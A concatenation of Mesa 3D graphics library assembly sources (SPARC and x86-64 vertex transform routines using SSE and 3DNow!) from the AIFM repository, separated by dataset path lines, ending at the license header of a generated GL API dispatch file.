fmuls %f2, M8, %f9 ! FGM Group f4 available
fmuls %f2, M9, %f10 ! FGM Group f7 available
fadds %f4, %f7, %f4 ! FGA
fmuls %f2, M10, %f11 ! FGM Group f5 available
fadds %f5, %f8, %f5 ! FGA Group f8, f3 available
fadds %f3, %f9, %f3 ! FGA Group f9 available
fadds %f4, %f10, %f4 ! FGA Group f10, f4 available
fadds %f5, %f11, %f5 ! FGA Group stall, f11, f5 available
fadds %f3, M12, %f3 ! FGA Group f3 available
st %f3, [%g2 + 0x00] ! LSU
fadds %f4, M13, %f4 ! FGA Group f4 available
st %f4, [%g2 + 0x04] ! LSU
fadds %f5, M14, %f5 ! FGA Group f5 available
st %f5, [%g2 + 0x08] ! LSU
cmp %o1, %g3 ! IEU1
bne 1b ! CTI
add %g2, 0x10, %g2 ! IEU0 Group
2:
ba __set_v4f_3
nop
.globl _mesa_sparc_transform_points3_3d_no_rot
_mesa_sparc_transform_points3_3d_no_rot:
ld [%o2 + V4F_STRIDE], %o5
LDPTR [%o2 + V4F_START], %g1
LDPTR [%o0 + V4F_START], %g2
ld [%o2 + V4F_COUNT], %g3
LDMATRIX_0_5_10_12_13_14(%o1)
cmp %g3, 0
st %g3, [%o0 + V4F_COUNT]
be 2f
clr %o1
1: ld [%g1 + 0x00], %f0 ! LSU Group
ld [%g1 + 0x04], %f1 ! LSU Group
ld [%g1 + 0x08], %f2 ! LSU Group
add %o1, 1, %o1 ! IEU0
add %g1, %o5, %g1 ! IEU1
cmp %o1, %g3 ! IEU1 Group
fmuls %f0, M0, %f3 ! FGM
fmuls %f1, M5, %f4 ! FGM Group
fmuls %f2, M10, %f5 ! FGM Group
fadds %f3, M12, %f3 ! FGA Group, stall, f3 available
st %f3, [%g2 + 0x00] ! LSU
fadds %f4, M13, %f4 ! FGA Group, f4 available
st %f4, [%g2 + 0x04] ! LSU
fadds %f5, M14, %f5 ! FGA Group, f5 available
st %f5, [%g2 + 0x08] ! LEU
bne 1b ! CTI
add %g2, 0x10, %g2 ! IEU0 Group
2:
ba __set_v4f_3
nop
.globl _mesa_sparc_transform_points3_perspective
_mesa_sparc_transform_points3_perspective:
ld [%o2 + V4F_STRIDE], %o5
LDPTR [%o2 + V4F_START], %g1
LDPTR [%o0 + V4F_START], %g2
ld [%o2 + V4F_COUNT], %g3
LDMATRIX_0_5_8_9_10_14(%o1)
cmp %g3, 0
st %g3, [%o0 + V4F_COUNT]
be 2f
clr %o1
1: ld [%g1 + 0x00], %f0 ! LSU Group
ld [%g1 + 0x04], %f1 ! LSU Group
ld [%g1 + 0x08], %f2 ! LSU Group
add %o1, 1, %o1 ! IEU0
add %g1, %o5, %g1 ! IEU1
fmuls %f0, M0, %f3 ! FGM
fmuls %f2, M8, %f6 ! FGM Group
fmuls %f1, M5, %f4 ! FGM Group
fmuls %f2, M9, %f7 ! FGM Group
fmuls %f2, M10, %f5 ! FGM Group f3 available
fadds %f3, %f6, %f3 ! FGA Group f6 available
st %f3, [%g2 + 0x00] ! LSU
fadds %f4, %f7, %f4 ! FGA Group stall, f4, f7 available
st %f4, [%g2 + 0x04] ! LSU
fadds %f5, M14, %f5 ! FGA Group
st %f5, [%g2 + 0x08] ! LSU
fnegs %f2, %f6 ! FGA Group
st %f6, [%g2 + 0x0c] ! LSU
cmp %o1, %g3 ! IEU1
bne 1b ! CTI
add %g2, 0x10, %g2 ! IEU0 Group
2:
ba __set_v4f_4
nop
.globl _mesa_sparc_transform_points4_general
_mesa_sparc_transform_points4_general:
ld [%o2 + V4F_STRIDE], %o5
LDPTR [%o2 + V4F_START], %g1
LDPTR [%o0 + V4F_START], %g2
ld [%o2 + V4F_COUNT], %g3
LDMATRIX_0_1_2_3_4_5_6_7_8_9_10_11_12_13_14_15(%o1)
cmp %g3, 0
st %g3, [%o0 + V4F_COUNT]
be 2f
clr %o1
1: ld [%g1 + 0x00], %f0 ! LSU Group
ld [%g1 + 0x04], %f1 ! LSU Group
ld [%g1 + 0x08], %f2 ! LSU Group
ld [%g1 + 0x0c], %f3 ! LSU Group
add %o1, 1, %o1 ! IEU0
add %g1, %o5, %g1 ! IEU1
fmuls %f0, M0, %f4 ! FGM Group
fmuls %f1, M4, %f8 ! FGM Group
fmuls %f0, M1, %f5 ! FGM Group
fmuls %f1, M5, %f9 ! FGM Group
fmuls %f0, M2, %f6 ! FGM Group f4 available
fmuls %f1, M6, %f10 ! FGM Group f8 available
fadds %f4, %f8, %f4 ! FGA
fmuls %f0, M3, %f7 ! FGM Group f5 available
fmuls %f1, M7, %f11 ! FGM Group f9 available
fadds %f5, %f9, %f5 ! FGA
fmuls %f2, M8, %f12 ! FGM Group f6 available
fmuls %f2, M9, %f13 ! FGM Group f10, f4 available
fadds %f6, %f10, %f6 ! FGA
fmuls %f2, M10, %f14 ! FGM Group f7 available
fmuls %f2, M11, %f15 ! FGM Group f11, f5 available
fadds %f7, %f11, %f7 ! FGA
fmuls %f3, M12, %f8 ! FGM Group f12 available
fadds %f4, %f12, %f4 ! FGA
fmuls %f3, M13, %f9 ! FGM Group f13, f6 available
fadds %f5, %f13, %f5 ! FGA
fmuls %f3, M14, %f10 ! FGM Group f14 available
fadds %f6, %f14, %f6 ! FGA
fmuls %f3, M15, %f11 ! FGM Group f15, f7 available
fadds %f7, %f15, %f7 ! FGA
fadds %f4, %f8, %f4 ! FGA Group f8, f4 available
st %f4, [%g2 + 0x00] ! LSU
fadds %f5, %f9, %f5 ! FGA Group f9, f5 available
st %f5, [%g2 + 0x04] ! LSU
fadds %f6, %f10, %f6 ! FGA Group f10, f6 available
st %f6, [%g2 + 0x08] ! LSU
fadds %f7, %f11, %f7 ! FGA Group f11, f7 available
st %f7, [%g2 + 0x0c] ! LSU
cmp %o1, %g3 ! IEU1
bne 1b ! CTI
add %g2, 0x10, %g2 ! IEU0 Group
2:
ba __set_v4f_4
nop
.globl _mesa_sparc_transform_points4_identity
_mesa_sparc_transform_points4_identity:
ld [%o2 + V4F_STRIDE], %o5
LDPTR [%o2 + V4F_START], %g1
LDPTR [%o0 + V4F_START], %g2
ld [%o2 + V4F_COUNT], %g3
cmp %g3, 0
st %g3, [%o0 + V4F_COUNT]
be 2f
clr %o1
1: ld [%g1 + 0x00], %f0
ld [%g1 + 0x04], %f1
ld [%g1 + 0x08], %f2
add %o1, 1, %o1
ld [%g1 + 0x0c], %f3
add %g1, %o5, %g1
st %f0, [%g2 + 0x00]
st %f1, [%g2 + 0x04]
st %f2, [%g2 + 0x08]
cmp %o1, %g3
st %f3, [%g2 + 0x0c]
bne 1b
add %g2, 0x10, %g2
2:
ba __set_v4f_4
nop
.globl _mesa_sparc_transform_points4_2d
_mesa_sparc_transform_points4_2d:
ld [%o2 + V4F_STRIDE], %o5
LDPTR [%o2 + V4F_START], %g1
LDPTR [%o0 + V4F_START], %g2
ld [%o2 + V4F_COUNT], %g3
LDMATRIX_0_1_4_5_12_13(%o1)
cmp %g3, 0
st %g3, [%o0 + V4F_COUNT]
be 2f
clr %o1
1: ld [%g1 + 0x00], %f0 ! LSU Group
ld [%g1 + 0x04], %f1 ! LSU Group
ld [%g1 + 0x08], %f2 ! LSU Group
ld [%g1 + 0x0c], %f3 ! LSU Group
add %o1, 1, %o1 ! IEU0
add %g1, %o5, %g1 ! IEU1
fmuls %f0, M0, %f4 ! FGM
fmuls %f1, M4, %f8 ! FGM Group
fmuls %f0, M1, %f5 ! FGM Group
fmuls %f1, M5, %f9 ! FGM Group f4 available
fmuls %f3, M12, %f12 ! FGM Group
fmuls %f3, M13, %f13 ! FGM Group f8 available
fadds %f4, %f8, %f4 ! FGA
fadds %f5, %f9, %f5 ! FGA Group stall, f5, f9 available
fadds %f4, %f12, %f4 ! FGA Group 2 cycle stall, f4, f12, f13 avail
st %f4, [%g2 + 0x00] ! LSU
fadds %f5, %f13, %f5 ! FGA Group f5 available
st %f5, [%g2 + 0x04] ! LSU
st %f2, [%g2 + 0x08] ! LSU Group
st %f3, [%g2 + 0x0c] ! LSU Group
cmp %o1, %g3 ! IEU1
bne 1b ! CTI
add %g2, 0x10, %g2 ! IEU0 Group
2:
ba __set_v4f_4
nop
.globl _mesa_sparc_transform_points4_2d_no_rot
_mesa_sparc_transform_points4_2d_no_rot:
ld [%o2 + V4F_STRIDE], %o5
LDPTR [%o2 + V4F_START], %g1
LDPTR [%o0 + V4F_START], %g2
ld [%o2 + V4F_COUNT], %g3
LDMATRIX_0_1_4_5_12_13(%o1)
cmp %g3, 0
st %g3, [%o0 + V4F_COUNT]
be 2f
clr %o1
1: ld [%g1 + 0x00], %f0
ld [%g1 + 0x04], %f1
ld [%g1 + 0x08], %f2
ld [%g1 + 0x0c], %f3
add %o1, 1, %o1
add %g1, %o5, %g1
fmuls %f0, M0, %f4
fmuls %f3, M12, %f8
fmuls %f1, M5, %f5
fmuls %f3, M13, %f9
fadds %f4, %f8, %f4
st %f4, [%g2 + 0x00]
fadds %f5, %f9, %f5
st %f5, [%g2 + 0x04]
st %f2, [%g2 + 0x08]
st %f3, [%g2 + 0x0c]
cmp %o1, %g3
bne 1b
add %g2, 0x10, %g2
2:
ba __set_v4f_4
nop
.globl _mesa_sparc_transform_points4_3d
_mesa_sparc_transform_points4_3d:
ld [%o2 + V4F_STRIDE], %o5
LDPTR [%o2 + V4F_START], %g1
LDPTR [%o0 + V4F_START], %g2
ld [%o2 + V4F_COUNT], %g3
LDMATRIX_0_1_2_4_5_6_8_9_10_12_13_14(%o1)
cmp %g3, 0
st %g3, [%o0 + V4F_COUNT]
be 2f
clr %o1
1: ld [%g1 + 0x00], %f0 ! LSU Group
ld [%g1 + 0x04], %f1 ! LSU Group
ld [%g1 + 0x08], %f2 ! LSU Group
ld [%g1 + 0x0c], %f3 ! LSU Group
add %o1, 1, %o1 ! IEU0
add %g1, %o5, %g1 ! IEU1
fmuls %f0, M0, %f4 ! FGM
fmuls %f1, M4, %f7 ! FGM Group
fmuls %f0, M1, %f5 ! FGM Group
fmuls %f1, M5, %f8 ! FGM Group
fmuls %f0, M2, %f6 ! FGM Group f4 available
fmuls %f1, M6, %f9 ! FGM Group f7 available
fadds %f4, %f7, %f4 ! FGA
fmuls %f2, M8, %f10 ! FGM Group f5 available
fmuls %f2, M9, %f11 ! FGM Group f8 available
fadds %f5, %f8, %f5 ! FGA
fmuls %f2, M10, %f12 ! FGM Group f6 available
fmuls %f3, M12, %f13 ! FGM Group f9, f4 available
fadds %f6, %f9, %f6 ! FGA
fmuls %f3, M13, %f14 ! FGM Group f10 available
fadds %f4, %f10, %f4 ! FGA
fmuls %f3, M14, %f15 ! FGM Group f11, f5 available
fadds %f5, %f11, %f5 ! FGA
fadds %f6, %f12, %f6 ! FGA Group stall, f12, f13, f6 available
fadds %f4, %f13, %f4 ! FGA Group f14, f4 available
st %f4, [%g2 + 0x00] ! LSU
fadds %f5, %f14, %f5 ! FGA Group f15, f5 available
st %f5, [%g2 + 0x04] ! LSU
fadds %f6, %f15, %f6 ! FGA Group f6 available
st %f6, [%g2 + 0x08] ! LSU
st %f3, [%g2 + 0x0c] ! LSU Group
cmp %o1, %g3 ! IEU1
bne 1b ! CTI
add %g2, 0x10, %g2 ! IEU0 Group
2:
ba __set_v4f_4
nop
.globl _mesa_sparc_transform_points4_3d_no_rot
_mesa_sparc_transform_points4_3d_no_rot:
ld [%o2 + V4F_STRIDE], %o5
LDPTR [%o2 + V4F_START], %g1
LDPTR [%o0 + V4F_START], %g2
ld [%o2 + V4F_COUNT], %g3
LDMATRIX_0_5_10_12_13_14(%o1)
cmp %g3, 0
st %g3, [%o0 + V4F_COUNT]
be 2f
clr %o1
1: ld [%g1 + 0x00], %f0 ! LSU Group
ld [%g1 + 0x04], %f1 ! LSU Group
ld [%g1 + 0x08], %f2 ! LSU Group
ld [%g1 + 0x0c], %f3 ! LSU Group
add %o1, 1, %o1 ! IEU0
add %g1, %o5, %g1 ! IEU1
fmuls %f0, M0, %f4 ! FGM
fmuls %f3, M12, %f7 ! FGM Group
fmuls %f1, M5, %f5 ! FGM Group
fmuls %f3, M13, %f8 ! FGM Group
fmuls %f2, M10, %f6 ! FGM Group f4 available
fmuls %f3, M14, %f9 ! FGM Group f7 available
fadds %f4, %f7, %f4 ! FGA
st %f4, [%g2 + 0x00] ! LSU
fadds %f5, %f8, %f5 ! FGA Group stall, f5, f8 available
st %f5, [%g2 + 0x04] ! LSU
fadds %f6, %f9, %f6 ! FGA Group stall, f6, f9 available
st %f6, [%g2 + 0x08] ! LSU
st %f3, [%g2 + 0x0c] ! LSU Group
cmp %o1, %g3 ! IEU1
bne 1b ! CTI
add %g2, 0x10, %g2 ! IEU0 Group
2:
ba __set_v4f_4
nop
.globl _mesa_sparc_transform_points4_perspective
_mesa_sparc_transform_points4_perspective:
ld [%o2 + V4F_STRIDE], %o5
LDPTR [%o2 + V4F_START], %g1
LDPTR [%o0 + V4F_START], %g2
ld [%o2 + V4F_COUNT], %g3
LDMATRIX_0_5_8_9_10_14(%o1)
cmp %g3, 0
st %g3, [%o0 + V4F_COUNT]
be 2f
clr %o1
1: ld [%g1 + 0x00], %f0 ! LSU Group
ld [%g1 + 0x04], %f1 ! LSU Group
ld [%g1 + 0x08], %f2 ! LSU Group
ld [%g1 + 0x0c], %f3 ! LSU Group
add %o1, 1, %o1 ! IEU0
add %g1, %o5, %g1 ! IEU1
fmuls %f0, M0, %f4 ! FGM
fmuls %f2, M8, %f7 ! FGM Group
fmuls %f1, M5, %f5 ! FGM Group
fmuls %f2, M9, %f8 ! FGM Group
fmuls %f2, M10, %f6 ! FGM Group f4 available
fmuls %f3, M14, %f9 ! FGM Group f7 available
fadds %f4, %f7, %f4 ! FGA
st %f4, [%g2 + 0x00] ! LSU
fadds %f5, %f8, %f5 ! FGA Group stall, f5, f8 available
st %f5, [%g2 + 0x04] ! LSU
fadds %f6, %f9, %f6 ! FGA Group stall, f6, f9 available
st %f6, [%g2 + 0x08] ! LSU
fnegs %f2, %f7 ! FGA Group
st %f7, [%g2 + 0x0c] ! LSU
cmp %o1, %g3 ! IEU1
bne 1b ! CTI
add %g2, 0x10, %g2 ! IEU0 Group
2:
ba __set_v4f_4
nop
|
AIFM-sys/AIFM
| 13,542
|
shenango/apps/parsec/pkgs/libs/mesa/src/src/mesa/x86-64/xform4.S
|
/*
* Mesa 3-D graphics library
* Version: 7.1
*
* Copyright (C) 1999-2007 Brian Paul All Rights Reserved.
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the "Software"),
* to deal in the Software without restriction, including without limitation
* the rights to use, copy, modify, merge, publish, distribute, sublicense,
* and/or sell copies of the Software, and to permit persons to whom the
* Software is furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included
* in all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
* BRIAN PAUL BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN
* AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
* CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*/
#ifdef USE_X86_64_ASM
#include "matypes.h"
.text
.align 16
.globl _mesa_x86_64_transform_points4_general
_mesa_x86_64_transform_points4_general:
/*
* rdi = dest
* rsi = matrix
* rdx = source
*/
movl V4F_COUNT(%rdx), %ecx /* count */
movzx V4F_STRIDE(%rdx), %eax /* stride */
movl %ecx, V4F_COUNT(%rdi) /* set dest count */
movl $4, V4F_SIZE(%rdi) /* set dest size */
.byte 0x66, 0x66, 0x66, 0x90 /* manual align += 3 */
orl $VEC_SIZE_4, V4F_FLAGS(%rdi)/* set dest flags */
testl %ecx, %ecx /* verify non-zero count */
prefetchnta 64(%rsi)
jz p4_general_done
movq V4F_START(%rdx), %rdx /* ptr to first src vertex */
movq V4F_START(%rdi), %rdi /* ptr to first dest vertex */
prefetch 16(%rdx)
movaps 0(%rsi), %xmm4 /* m3 | m2 | m1 | m0 */
movaps 16(%rsi), %xmm5 /* m7 | m6 | m5 | m4 */
.byte 0x66, 0x66, 0x90 /* manual align += 3 */
movaps 32(%rsi), %xmm6 /* m11 | m10 | m9 | m8 */
movaps 48(%rsi), %xmm7 /* m15 | m14 | m13 | m12 */
p4_general_loop:
movups (%rdx), %xmm8 /* ox | oy | oz | ow */
prefetchw 16(%rdi)
pshufd $0x00, %xmm8, %xmm0 /* ox | ox | ox | ox */
addq %rax, %rdx
pshufd $0x55, %xmm8, %xmm1 /* oy | oy | oy | oy */
mulps %xmm4, %xmm0 /* ox*m3 | ox*m2 | ox*m1 | ox*m0 */
pshufd $0xAA, %xmm8, %xmm2 /* oz | oz | oz | ox */
mulps %xmm5, %xmm1 /* oy*m7 | oy*m6 | oy*m5 | oy*m4 */
pshufd $0xFF, %xmm8, %xmm3 /* ow | ow | ow | ow */
mulps %xmm6, %xmm2 /* oz*m11 | oz*m10 | oz*m9 | oz*m8 */
addps %xmm1, %xmm0 /* ox*m3+oy*m7 | ... */
mulps %xmm7, %xmm3 /* ow*m15 | ow*m14 | ow*m13 | ow*m12 */
addps %xmm2, %xmm0 /* ox*m3+oy*m7+oz*m11 | ... */
prefetch 16(%rdx)
addps %xmm3, %xmm0 /* ox*m3+oy*m7+oz*m11+ow*m15 | ... */
movaps %xmm0, (%rdi) /* ->D(3) | ->D(2) | ->D(1) | ->D(0) */
addq $16, %rdi
decl %ecx
jnz p4_general_loop
p4_general_done:
.byte 0xf3
ret
.section .rodata
.align 16
p4_constants:
.byte 0xff, 0xff, 0xff, 0xff
.byte 0xff, 0xff, 0xff, 0xff
.byte 0xff, 0xff, 0xff, 0xff
.byte 0x00, 0x00, 0x00, 0x00
.byte 0x00, 0x00, 0x00, 0x00
.byte 0x00, 0x00, 0x00, 0x00
.byte 0x00, 0x00, 0x00, 0x00
.float 0f+1.0
.text
.align 16
.globl _mesa_x86_64_transform_points4_3d
/*
* this is slower than _mesa_x86_64_transform_points4_general
* because it ensures that the last matrix row (or is it column?) is 0,0,0,1
*/
_mesa_x86_64_transform_points4_3d:
leaq p4_constants(%rip), %rax
prefetchnta 64(%rsi)
movaps (%rax), %xmm9
movaps 16(%rax), %xmm10
movl V4F_COUNT(%rdx), %ecx /* count */
movzx V4F_STRIDE(%rdx), %eax /* stride */
movl %ecx, V4F_COUNT(%rdi) /* set dest count */
movl $4, V4F_SIZE(%rdi) /* set dest size */
orl $VEC_SIZE_4, V4F_FLAGS(%rdi)/* set dest flags */
testl %ecx, %ecx /* verify non-zero count */
jz p4_3d_done
movq V4F_START(%rdx), %rdx /* ptr to first src vertex */
movq V4F_START(%rdi), %rdi /* ptr to first dest vertex */
prefetch 16(%rdx)
movaps 0(%rsi), %xmm4 /* m3 | m2 | m1 | m0 */
movaps 16(%rsi), %xmm5 /* m7 | m6 | m5 | m4 */
andps %xmm9, %xmm4 /* 0.0 | m2 | m1 | m0 */
movaps 32(%rsi), %xmm6 /* m11 | m10 | m9 | m8 */
andps %xmm9, %xmm5 /* 0.0 | m6 | m5 | m4 */
movaps 48(%rsi), %xmm7 /* m15 | m14 | m13 | m12 */
andps %xmm9, %xmm6 /* 0.0 | m10 | m9 | m8 */
andps %xmm9, %xmm7 /* 0.0 | m14 | m13 | m12 */
.byte 0x66, 0x66, 0x90 /* manual align += 3 */
orps %xmm10, %xmm7 /* 1.0 | m14 | m13 | m12 */
p4_3d_loop:
movups (%rdx), %xmm8 /* ox | oy | oz | ow */
prefetchw 16(%rdi)
pshufd $0x00, %xmm8, %xmm0 /* ox | ox | ox | ox */
addq %rax, %rdx
pshufd $0x55, %xmm8, %xmm1 /* oy | oy | oy | oy */
mulps %xmm4, %xmm0 /* ox*m3 | ox*m2 | ox*m1 | ox*m0 */
pshufd $0xAA, %xmm8, %xmm2 /* oz | oz | oz | ox */
mulps %xmm5, %xmm1 /* oy*m7 | oy*m6 | oy*m5 | oy*m4 */
pshufd $0xFF, %xmm8, %xmm3 /* ow | ow | ow | ow */
mulps %xmm6, %xmm2 /* oz*m11 | oz*m10 | oz*m9 | oz*m8 */
addps %xmm1, %xmm0 /* ox*m3+oy*m7 | ... */
mulps %xmm7, %xmm3 /* ow*m15 | ow*m14 | ow*m13 | ow*m12 */
addps %xmm2, %xmm0 /* ox*m3+oy*m7+oz*m11 | ... */
prefetch 16(%rdx)
addps %xmm3, %xmm0 /* ox*m3+oy*m7+oz*m11+ow*m15 | ... */
movaps %xmm0, (%rdi) /* ->D(3) | ->D(2) | ->D(1) | ->D(0) */
addq $16, %rdi
dec %ecx
jnz p4_3d_loop
p4_3d_done:
.byte 0xf3
ret
.align 16
.globl _mesa_x86_64_transform_points4_identity
_mesa_x86_64_transform_points4_identity:
movl V4F_COUNT(%rdx), %ecx /* count */
movzx V4F_STRIDE(%rdx), %eax /* stride */
movl %ecx, V4F_COUNT(%rdi) /* set dest count */
movl $4, V4F_SIZE(%rdi) /* set dest size */
orl $VEC_SIZE_4, V4F_FLAGS(%rdi)/* set dest flags */
test %ecx, %ecx
jz p4_identity_done
movq V4F_START(%rdx), %rsi /* ptr to first src vertex */
movq V4F_START(%rdi), %rdi /* ptr to first dest vertex */
prefetch 64(%rsi)
prefetchw 64(%rdi)
add %ecx, %ecx
rep movsq
p4_identity_done:
.byte 0xf3
ret
.align 16
.globl _mesa_x86_64_transform_points4_3d_no_rot
_mesa_x86_64_transform_points4_3d_no_rot:
movl V4F_COUNT(%rdx), %ecx /* count */
movzx V4F_STRIDE(%rdx), %eax /* stride */
movl %ecx, V4F_COUNT(%rdi) /* set dest count */
movl $4, V4F_SIZE(%rdi) /* set dest size */
.byte 0x66, 0x66, 0x90 /* manual align += 3 */
orl $VEC_SIZE_4, V4F_FLAGS(%rdi)/* set dest flags */
test %ecx, %ecx
.byte 0x66, 0x66, 0x90 /* manual align += 3 */
jz p4_3d_no_rot_done
movq V4F_START(%rdx), %rdx /* ptr to first src vertex */
movq V4F_START(%rdi), %rdi /* ptr to first dest vertex */
prefetch (%rdx)
movd (%rsi), %mm0 /* | m00 */
.byte 0x66, 0x66, 0x90 /* manual align += 3 */
punpckldq 20(%rsi), %mm0 /* m11 | m00 */
movd 40(%rsi), %mm2 /* | m22 */
movq 48(%rsi), %mm1 /* m31 | m30 */
punpckldq 56(%rsi), %mm2 /* m11 | m00 */
p4_3d_no_rot_loop:
prefetchw 32(%rdi)
movq (%rdx), %mm4 /* x1 | x0 */
movq 8(%rdx), %mm5 /* x3 | x2 */
movd 12(%rdx), %mm7 /* | x3 */
movq %mm5, %mm6 /* x3 | x2 */
pfmul %mm0, %mm4 /* x1*m11 | x0*m00 */
punpckhdq %mm6, %mm6 /* x3 | x3 */
pfmul %mm2, %mm5 /* x3*m32 | x2*m22 */
pfmul %mm1, %mm6 /* x3*m31 | x3*m30 */
pfacc %mm7, %mm5 /* x3 | x2*m22+x3*m32 */
pfadd %mm6, %mm4 /* x1*m11+x3*m31 | x0*m00+x3*m30 */
addq %rax, %rdx
movq %mm4, (%rdi) /* write r0, r1 */
movq %mm5, 8(%rdi) /* write r2, r3 */
addq $16, %rdi
decl %ecx
prefetch 32(%rdx)
jnz p4_3d_no_rot_loop
p4_3d_no_rot_done:
femms
ret
.align 16
.globl _mesa_x86_64_transform_points4_perspective
_mesa_x86_64_transform_points4_perspective:
movl V4F_COUNT(%rdx), %ecx /* count */
movzx V4F_STRIDE(%rdx), %eax /* stride */
movl %ecx, V4F_COUNT(%rdi) /* set dest count */
movl $4, V4F_SIZE(%rdi) /* set dest size */
orl $VEC_SIZE_4, V4F_FLAGS(%rdi)/* set dest flags */
test %ecx, %ecx
.byte 0x66, 0x66, 0x90 /* manual align += 3 */
jz p4_perspective_done
movq V4F_START(%rdx), %rdx /* ptr to first src vertex */
movq V4F_START(%rdi), %rdi /* ptr to first dest vertex */
movd (%rsi), %mm0 /* | m00 */
pxor %mm7, %mm7 /* 0 | 0 */
punpckldq 20(%rsi), %mm0 /* m11 | m00 */
movq 32(%rsi), %mm2 /* m21 | m20 */
prefetch (%rdx)
movd 40(%rsi), %mm1 /* | m22 */
.byte 0x66, 0x66, 0x90 /* manual align += 3 */
punpckldq 56(%rsi), %mm1 /* m32 | m22 */
p4_perspective_loop:
prefetchw 32(%rdi) /* prefetch 2 vertices ahead */
movq (%rdx), %mm4 /* x1 | x0 */
movq 8(%rdx), %mm5 /* x3 | x2 */
movd 8(%rdx), %mm3 /* | x2 */
movq %mm5, %mm6 /* x3 | x2 */
pfmul %mm0, %mm4 /* x1*m11 | x0*m00 */
punpckldq %mm5, %mm5 /* x2 | x2 */
pfmul %mm2, %mm5 /* x2*m21 | x2*m20 */
pfsubr %mm7, %mm3 /* | -x2 */
pfmul %mm1, %mm6 /* x3*m32 | x2*m22 */
pfadd %mm4, %mm5 /* x1*m11+x2*m21 | x0*m00+x2*m20 */
pfacc %mm3, %mm6 /* -x2 | x2*m22+x3*m32 */
movq %mm5, (%rdi) /* write r0, r1 */
addq %rax, %rdx
movq %mm6, 8(%rdi) /* write r2, r3 */
addq $16, %rdi
decl %ecx
prefetch 32(%rdx) /* hopefully stride is zero */
jnz p4_perspective_loop
p4_perspective_done:
femms
ret
.align 16
.globl _mesa_x86_64_transform_points4_2d_no_rot
_mesa_x86_64_transform_points4_2d_no_rot:
movl V4F_COUNT(%rdx), %ecx /* count */
movzx V4F_STRIDE(%rdx), %eax /* stride */
movl %ecx, V4F_COUNT(%rdi) /* set dest count */
movl $4, V4F_SIZE(%rdi) /* set dest size */
orl $VEC_SIZE_4, V4F_FLAGS(%rdi)/* set dest flags */
test %ecx, %ecx
.byte 0x90 /* manual align += 1 */
jz p4_2d_no_rot_done
movq V4F_START(%rdx), %rdx /* ptr to first src vertex */
movq V4F_START(%rdi), %rdi /* ptr to first dest vertex */
movd (%rsi), %mm0 /* | m00 */
prefetch (%rdx)
punpckldq 20(%rsi), %mm0 /* m11 | m00 */
movq 48(%rsi), %mm1 /* m31 | m30 */
p4_2d_no_rot_loop:
prefetchw 32(%rdi) /* prefetch 2 vertices ahead */
movq (%rdx), %mm4 /* x1 | x0 */
movq 8(%rdx), %mm5 /* x3 | x2 */
pfmul %mm0, %mm4 /* x1*m11 | x0*m00 */
movq %mm5, %mm6 /* x3 | x2 */
punpckhdq %mm6, %mm6 /* x3 | x3 */
addq %rax, %rdx
pfmul %mm1, %mm6 /* x3*m31 | x3*m30 */
prefetch 32(%rdx) /* hopefully stride is zero */
pfadd %mm4, %mm6 /* x1*m11+x3*m31 | x0*m00+x3*m30 */
movq %mm6, (%rdi) /* write r0, r1 */
movq %mm5, 8(%rdi) /* write r2, r3 */
addq $16, %rdi
decl %ecx
jnz p4_2d_no_rot_loop
p4_2d_no_rot_done:
femms
ret
.align 16
.globl _mesa_x86_64_transform_points4_2d
_mesa_x86_64_transform_points4_2d:
movl V4F_COUNT(%rdx), %ecx /* count */
movzx V4F_STRIDE(%rdx), %eax /* stride */
movl %ecx, V4F_COUNT(%rdi) /* set dest count */
movl $4, V4F_SIZE(%rdi) /* set dest size */
.byte 0x66, 0x66, 0x90 /* manual align += 4 */
orl $VEC_SIZE_4, V4F_FLAGS(%rdi)/* set dest flags */
test %ecx, %ecx
.byte 0x66, 0x66, 0x90 /* manual align += 4 */
jz p4_2d_done
movq V4F_START(%rdx), %rdx /* ptr to first src vertex */
movq V4F_START(%rdi), %rdi /* ptr to first dest vertex */
movd (%rsi), %mm0 /* | m00 */
movd 4(%rsi), %mm1 /* | m01 */
prefetch (%rdx)
punpckldq 16(%rsi), %mm0 /* m10 | m00 */
.byte 0x66, 0x66, 0x90 /* manual align += 4 */
punpckldq 20(%rsi), %mm1 /* m11 | m01 */
movq 48(%rsi), %mm2 /* m31 | m30 */
p4_2d_loop:
prefetchw 32(%rdi) /* prefetch 2 vertices ahead */
movq (%rdx), %mm3 /* x1 | x0 */
movq 8(%rdx), %mm5 /* x3 | x2 */
movq %mm3, %mm4 /* x1 | x0 */
movq %mm5, %mm6 /* x3 | x2 */
pfmul %mm1, %mm4 /* x1*m11 | x0*m01 */
punpckhdq %mm6, %mm6 /* x3 | x3 */
pfmul %mm0, %mm3 /* x1*m10 | x0*m00 */
addq %rax, %rdx
pfacc %mm4, %mm3 /* x0*m01+x1*m11 | x0*m00+x1*m10 */
pfmul %mm2, %mm6 /* x3*m31 | x3*m30 */
prefetch 32(%rdx) /* hopefully stride is zero */
pfadd %mm6, %mm3 /* r1 | r0 */
movq %mm3, (%rdi) /* write r0, r1 */
movq %mm5, 8(%rdi) /* write r2, r3 */
addq $16, %rdi
decl %ecx
jnz p4_2d_loop
p4_2d_done:
femms
ret
#endif
#if defined (__ELF__) && defined (__linux__)
.section .note.GNU-stack,"",%progbits
#endif
|
AIFM-sys/AIFM
| 589,257
|
shenango/apps/parsec/pkgs/libs/mesa/src/src/mesa/x86-64/glapi_x86-64.S
|
/* DO NOT EDIT - This file generated automatically by gl_x86-64_asm.py (from Mesa) script */
/*
* (C) Copyright IBM Corporation 2005
* All Rights Reserved.
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the "Software"),
* to deal in the Software without restriction, including without limitation
* the rights to use, copy, modify, merge, publish, distribute, sub license,
* and/or sell copies of the Software, and to permit persons to whom the
* Software is furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice (including the next
* paragraph) shall be included in all copies or substantial portions of the
* Software.
*
